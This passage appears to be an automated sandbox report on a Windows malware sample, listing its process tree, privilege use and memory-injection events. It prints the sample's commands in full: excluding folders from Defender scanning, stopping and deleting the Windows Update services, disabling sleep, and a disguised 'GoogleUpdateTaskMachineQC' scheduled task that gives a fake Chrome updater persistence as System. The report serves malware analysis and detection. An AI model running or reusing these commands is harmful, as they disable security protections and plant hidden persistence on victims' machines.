powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeShutdownPrivilege 4020 powercfg.exe Token: SeCreatePagefilePrivilege 4020 powercfg.exe Token: SeShutdownPrivilege 4120 powercfg.exe Token: SeCreatePagefilePrivilege 4120 powercfg.exe Token: SeShutdownPrivilege 1660 powercfg.exe Token: SeCreatePagefilePrivilege 1660 powercfg.exe Token: SeShutdownPrivilege 4124 powercfg.exe Token: SeCreatePagefilePrivilege 4124 powercfg.exe Token: SeIncreaseQuotaPrivilege 3624 powershell.exe Token: SeSecurityPrivilege 3624 powershell.exe Token: SeTakeOwnershipPrivilege 3624 powershell.exe Token: SeLoadDriverPrivilege 3624 powershell.exe Token: SeSystemProfilePrivilege 3624 powershell.exe Token: SeSystemtimePrivilege 3624 powershell.exe Token: SeProfSingleProcessPrivilege 3624 powershell.exe Token: SeIncBasePriorityPrivilege 3624 powershell.exe Token: SeCreatePagefilePrivilege 3624 powershell.exe Token: SeBackupPrivilege 3624 powershell.exe Token: SeRestorePrivilege 3624 powershell.exe Token: SeShutdownPrivilege 3624 powershell.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeSystemEnvironmentPrivilege 3624 powershell.exe Token: SeRemoteShutdownPrivilege 3624 powershell.exe Token: SeUndockPrivilege 3624 powershell.exe Token: SeManageVolumePrivilege 3624 powershell.exe Token: 33 3624 powershell.exe Token: 34 3624 powershell.exe Token: 35 3624 powershell.exe Token: 36 3624 powershell.exe Token: SeIncreaseQuotaPrivilege 3624 powershell.exe Token: SeSecurityPrivilege 3624 powershell.exe Token: SeTakeOwnershipPrivilege 3624 powershell.exe Token: SeLoadDriverPrivilege 3624 powershell.exe Token: SeSystemProfilePrivilege 3624 powershell.exe Token: SeSystemtimePrivilege 3624 powershell.exe Token: SeProfSingleProcessPrivilege 3624 powershell.exe Token: SeIncBasePriorityPrivilege 3624 powershell.exe Token: SeCreatePagefilePrivilege 3624 powershell.exe Token: SeBackupPrivilege 3624 powershell.exe Token: SeRestorePrivilege 3624 powershell.exe Token: SeShutdownPrivilege 3624 powershell.exe Token: SeDebugPrivilege 3624 powershell.exe Token: SeSystemEnvironmentPrivilege 3624 powershell.exe Token: SeRemoteShutdownPrivilege 3624 powershell.exe Token: SeUndockPrivilege 3624 powershell.exe Token: SeManageVolumePrivilege 3624 powershell.exe Token: 33 3624 powershell.exe Token: 34 3624 powershell.exe Token: 35 3624 powershell.exe Token: 36 3624 powershell.exe Token: SeIncreaseQuotaPrivilege 3624 powershell.exe Token: SeSecurityPrivilege 3624 powershell.exe Token: SeTakeOwnershipPrivilege 3624 powershell.exe Token: SeLoadDriverPrivilege 3624 powershell.exe Token: SeSystemProfilePrivilege 3624 powershell.exe Token: SeSystemtimePrivilege 3624 powershell.exe Token: SeProfSingleProcessPrivilege 3624 powershell.exe Token: SeIncBasePriorityPrivilege 3624 powershell.exe Token: SeCreatePagefilePrivilege 3624 powershell.exe Token: SeBackupPrivilege 3624 powershell.exe Token: SeRestorePrivilege 3624 powershell.exe Token: SeShutdownPrivilege 3624 powershell.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
Explorer.EXEpid process 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE -
Suspicious use of SendNotifyMessage 36 IoCs
Processes:
Explorer.EXEpid process 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE -
Suspicious use of SetWindowsHookEx 27 IoCs
Processes:
Explorer.EXEdmi1dfg7n.exeConhost.exeConhost.exeConhost.exepid process 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 4408 dmi1dfg7n.exe 4676 Conhost.exe 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 3212 Explorer.EXE 4448 Conhost.exe 1864 Conhost.exe 3212 Explorer.EXE 3212 Explorer.EXE -
Suspicious use of UnmapMainImage 3 IoCs
Processes:
RuntimeBroker.exeRuntimeBroker.exeExplorer.EXEpid process 3704 RuntimeBroker.exe 5100 RuntimeBroker.exe 3212 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
dmi1dfg7n.execmd.execmd.exepowershell.exepowershell.EXEdllhost.exelsass.exeupdater.exedescription pid process target process PID 4980 wrote to memory of 408 4980 dmi1dfg7n.exe powershell.exe PID 4980 wrote to memory of 408 4980 dmi1dfg7n.exe powershell.exe PID 4980 wrote to memory of 4944 4980 dmi1dfg7n.exe cmd.exe PID 4980 wrote to memory of 4944 4980 dmi1dfg7n.exe cmd.exe PID 4980 wrote to memory of 384 4980 dmi1dfg7n.exe cmd.exe PID 4980 wrote to memory of 384 4980 dmi1dfg7n.exe cmd.exe PID 4980 wrote to memory of 3624 4980 dmi1dfg7n.exe powershell.exe PID 4980 wrote to memory of 3624 4980 dmi1dfg7n.exe powershell.exe PID 4944 wrote to memory of 1504 4944 cmd.exe sc.exe PID 4944 wrote to memory of 1504 4944 cmd.exe sc.exe PID 384 wrote to memory of 4020 384 cmd.exe powercfg.exe PID 384 wrote to memory of 4020 384 cmd.exe powercfg.exe PID 4944 wrote to memory of 3696 4944 cmd.exe sc.exe PID 4944 wrote to memory of 3696 4944 cmd.exe sc.exe PID 4944 wrote to memory of 3016 4944 cmd.exe sc.exe PID 4944 wrote to memory of 3016 4944 cmd.exe sc.exe PID 384 wrote to memory of 4120 384 cmd.exe powercfg.exe PID 384 wrote to memory of 4120 384 cmd.exe powercfg.exe PID 4944 wrote to memory of 2624 4944 cmd.exe sc.exe PID 4944 wrote to memory of 2624 4944 cmd.exe sc.exe PID 384 wrote to memory of 1660 384 cmd.exe powercfg.exe PID 384 wrote to memory of 1660 384 cmd.exe powercfg.exe PID 4944 wrote to memory of 2560 4944 cmd.exe sc.exe PID 4944 wrote to memory of 2560 4944 cmd.exe sc.exe PID 384 wrote to memory of 4124 384 cmd.exe powercfg.exe PID 384 wrote to memory of 4124 384 cmd.exe powercfg.exe PID 4944 wrote to memory of 396 4944 cmd.exe reg.exe PID 4944 wrote to memory of 396 4944 cmd.exe reg.exe PID 4944 wrote to memory of 1368 4944 cmd.exe reg.exe PID 4944 wrote to memory of 1368 4944 cmd.exe reg.exe PID 4944 wrote to memory of 2808 4944 cmd.exe reg.exe PID 4944 wrote to memory of 2808 4944 cmd.exe reg.exe PID 4944 wrote to memory of 4348 4944 cmd.exe reg.exe PID 4944 wrote to memory of 4348 4944 cmd.exe reg.exe PID 4944 wrote to memory of 4764 4944 cmd.exe reg.exe PID 4944 wrote to memory of 4764 4944 cmd.exe reg.exe PID 4980 wrote to memory of 2892 4980 dmi1dfg7n.exe dialer.exe PID 4980 wrote to memory of 2892 4980 dmi1dfg7n.exe dialer.exe PID 4980 wrote to memory of 2892 4980 dmi1dfg7n.exe dialer.exe PID 4980 wrote to memory of 3084 4980 dmi1dfg7n.exe powershell.exe PID 4980 wrote to memory of 3084 4980 dmi1dfg7n.exe powershell.exe PID 3084 wrote to memory of 2620 3084 powershell.exe schtasks.exe PID 3084 wrote to memory of 2620 3084 powershell.exe schtasks.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 1688 wrote to memory of 3720 1688 powershell.EXE dllhost.exe PID 3720 wrote to memory of 624 3720 dllhost.exe winlogon.exe PID 3720 wrote to memory of 692 3720 dllhost.exe lsass.exe PID 3720 wrote to memory of 968 3720 dllhost.exe svchost.exe PID 3720 wrote to memory of 60 3720 dllhost.exe dwm.exe PID 692 wrote to memory of 2176 692 lsass.exe sysmon.exe PID 852 wrote to memory of 4448 852 updater.exe powershell.exe PID 852 wrote to memory of 4448 852 updater.exe powershell.exe PID 3720 wrote to memory of 452 3720 dllhost.exe svchost.exe PID 692 wrote to memory of 2176 692 lsass.exe sysmon.exe PID 3720 wrote to memory of 716 3720 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f5c002a6-b068-4104-8131-fedd7f47f8ee}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{f49f8606-5d2a-4cce-950f-c5747e47e15c}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{96bbd1b9-7297-4d8a-9e47-1944eeb835a8}2⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{4ee13b5f-6667-46bf-8b2c-2b3bccf92d7d}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{abfb3ee6-7747-4b30-97ae-75f6692e32ab}2⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{552184cf-ce11-458a-a567-f75c73949ff8}2⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC4⤵
-
C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
- Enumerates system info in registry
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Checks computer location settings
- Checks system information in the registry
- Enumerates system info in registry
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Checks processor information in registry
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC4⤵
-
C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1688 -s 2205⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC4⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3516 -s 1482⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4456 -s 3562⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
